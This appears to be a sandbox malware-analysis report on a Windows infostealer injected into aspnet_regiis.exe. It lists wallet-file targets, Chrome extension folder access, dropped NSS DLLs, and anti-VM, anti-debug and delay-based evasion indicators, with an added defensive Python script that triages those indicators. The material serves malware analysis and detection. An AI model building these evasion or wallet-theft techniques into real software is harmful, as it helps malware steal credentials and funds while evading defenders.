Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A18950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_02A18950
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR
Source: aspnet_regiis.exe Binary or memory string: DIR_WATCH.DLL
Source: aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: aspnet_regiis.exe Binary or memory string: SBIEDLL.DLL
Source: aspnet_regiis.exe Binary or memory string: API_LOG.DLL
Source: C:\Users\user\Desktop\file.exe Memory allocated: 2D60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 2EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 4EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 5540000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 6540000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 6670000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 7670000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 7A20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 8A20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 9A20000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 3_2_02A0180D
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Window / User API: threadDelayed 831 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Window / User API: threadDelayed 1900 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe API coverage: 9.1 %
Source: C:\Users\user\Desktop\file.exe TID: 3980 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A10DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 02A10EEEh 3_2_02A10DDB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D5D38ED FindFirstFileExW, 0_2_6D5D38ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A15FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_02A15FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 3_2_02A0BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A14CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 3_2_02A14CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A1543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 3_2_02A1543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A01D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_02A01D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_02A0D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_02A0B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A09D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_02A09D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A15B0B GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 3_2_02A15B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_02A0B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 3_2_02A0CD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A15142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen, 3_2_02A15142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A10FBA GetSystemInfo,wsprintfA, 3_2_02A10FBA
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
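The evasion evidence above is spread over several indicator classes: MEM_WRITE_WATCH reservations (the sample can later ask GetWriteWatch whether anything outside its own code touched those pages), cursor-position sampling across Sleep calls, a keyboard-layout enumeration followed by a compare, a process-list walk with name comparisons, and a thread delay of 922337203685477 ms. That last number is not random: Sleep(ms) is passed to NtDelayExecution as a negative 100-ns LARGE_INTEGER, and 922337203685477 is INT64_MAX // 10000, the largest relative delay the interface can express. The following Python is an added example (not part of the report or the sample) that triages such lines: it extracts the API chains, matches ordered call idioms, counts write-watch regions and explains the delay value. The idiom table and the constructed sample lines (copied from the entries above) are the author's own; the meanings attached to each idiom are interpretation, not something the report states.

```python
import re

# Constructed sample: behaviour lines copied from the report above (one per indicator class).
TRACE_LINES = [
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 3_2_02A0180D",
    r"Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A10DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 02A10EEEh 3_2_02A10DDB",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 3_2_02A124A8",
    r"Source: C:\Users\user\Desktop\file.exe Memory allocated: 2D60000 memory reserve | memory write watch Jump to behavior",
]

# Sleep(ms) becomes NtDelayExecution(-(ms * 10000)) in 100-ns units, so the largest relative
# delay a signed 64-bit interval can express is INT64_MAX // 10000 milliseconds.
INT64_MAX_MS = (2**63 - 1) // 10000

# Ordered (not necessarily adjacent) API sequences and what they usually mean.
# Assumption: this table is the author's interpretation, not part of the report.
IDIOMS = {
    ("GetCursorPos", "Sleep", "GetCursorPos"): "user-presence check: cursor sampled across a delay",
    ("CreateToolhelp32Snapshot", "Process32Next", "StrCmpCA"): "process-name scan: walks the process list and compares names",
}

# "Code function: [<id> ]<call,call,...>, <id>" as the report prints it.
CALLS_RE = re.compile(r"Code function: (?:\S+ )?([^ ]+), \S+$")
DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")


def classify_delay(ms: int) -> str:
    """Explain a thread delay; the INT64_MAX value is bait for sandboxes that skip or shorten sleeps."""
    if ms == INT64_MAX_MS:
        return "max-int64 delay (effectively infinite; bait for sleep-skipping sandboxes)"
    if ms >= 30_000:
        return "long delay (>= 30 s)"
    return "short delay"


def has_ordered_calls(calls, pattern) -> bool:
    """True if every name in pattern appears in calls, in that order, with anything in between."""
    it = iter(calls)
    return all(any(call == want for call in it) for want in pattern)


def analyse_evasion(lines):
    """Collect evasion indicators from report lines into one dict."""
    report = {"idioms": [], "delays": [], "write_watch_regions": 0, "keyboard_layout_gate": False}
    for line in lines:
        if "memory write watch" in line:
            # MEM_WRITE_WATCH lets the sample detect an emulator or hook that scribbles on its pages.
            report["write_watch_regions"] += 1
        if "GetKeyboardLayoutList followed by cmp" in line:
            # Layout enumeration feeding a compare/branch: a locale gate before the payload runs.
            report["keyboard_layout_gate"] = True
        if m := DELAY_RE.search(line):
            ms = int(m.group(1))
            report["delays"].append((ms, classify_delay(ms)))
        if m := CALLS_RE.search(line):
            calls = m.group(1).split(",")
            for pattern, meaning in IDIOMS.items():
                if has_ordered_calls(calls, pattern):
                    report["idioms"].append(meaning)
    return report


if __name__ == "__main__":
    for key, value in analyse_evasion(TRACE_LINES).items():
        print(f"{key}: {value}")
```

The ordered-subsequence match is deliberately loose: Vidar-style code interleaves the cursor reads with other calls, so requiring adjacency would miss it, while requiring order still rules out a single incidental GetCursorPos.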
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: Amcache.hve.3.dr Binary or memory string: VMware
Source: CFBFHI.3.dr Binary or memory string: global block list test formVMware20,11696497155
Source: CFBFHI.3.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: Amcache.hve.3.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware-
Source: Amcache.hve.3.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: CFBFHI.3.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: CFBFHI.3.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: CFBFHI.3.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: CFBFHI.3.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: CFBFHI.3.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: Amcache.hve.3.dr Binary or memory string: vmci.sys
Source: CFBFHI.3.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: CFBFHI.3.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1
Source: CFBFHI.3.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: CFBFHI.3.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.3.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: CFBFHI.3.dr Binary or memory string: discord.comVMware20,11696497155f
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: CFBFHI.3.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: Amcache.hve.3.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: CFBFHI.3.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: CFBFHI.3.dr Binary or memory string: outlook.office.comVMware20,11696497155s
Source: CFBFHI.3.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Amcache.hve.3.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: CFBFHI.3.dr Binary or memory string: dev.azure.comVMware20,11696497155j
Source: CFBFHI.3.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: CFBFHI.3.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: CFBFHI.3.dr Binary or memory string: tasks.office.comVMware20,11696497155o
Source: CFBFHI.3.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: CFBFHI.3.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW<Q'2
Source: Amcache.hve.3.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: CFBFHI.3.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: CFBFHI.3.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: CFBFHI.3.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr Binary or memory string: \driver\vmci,\driver\pci
Source: CFBFHI.3.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: CFBFHI.3.dr Binary or memory string: AMC password management pageVMware20,11696497155
Source: Amcache.hve.3.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP$
Source: CFBFHI.3.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: Amcache.hve.3.dr Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.3.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: CFBFHI.3.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: CFBFHI.3.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: CFBFHI.3.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D5D199C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6D5D199C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A18950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_02A18950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A014AD mov eax, dword ptr fs:[00000030h] 3_2_02A014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A014A2 mov eax, dword ptr fs:[00000030h] 3_2_02A014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0148A mov eax, dword ptr fs:[00000030h] 3_2_02A0148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A18599 mov eax, dword ptr fs:[00000030h] 3_2_02A18599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A1859A mov eax, dword ptr fs:[00000030h] 3_2_02A1859A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D5D5010 GetProcessHeap, 0_2_6D5D5010
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D5D199C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6D5D199C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D5CD4D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6D5CD4D7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D5CDA02 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6D5CDA02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A1D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_02A1D016
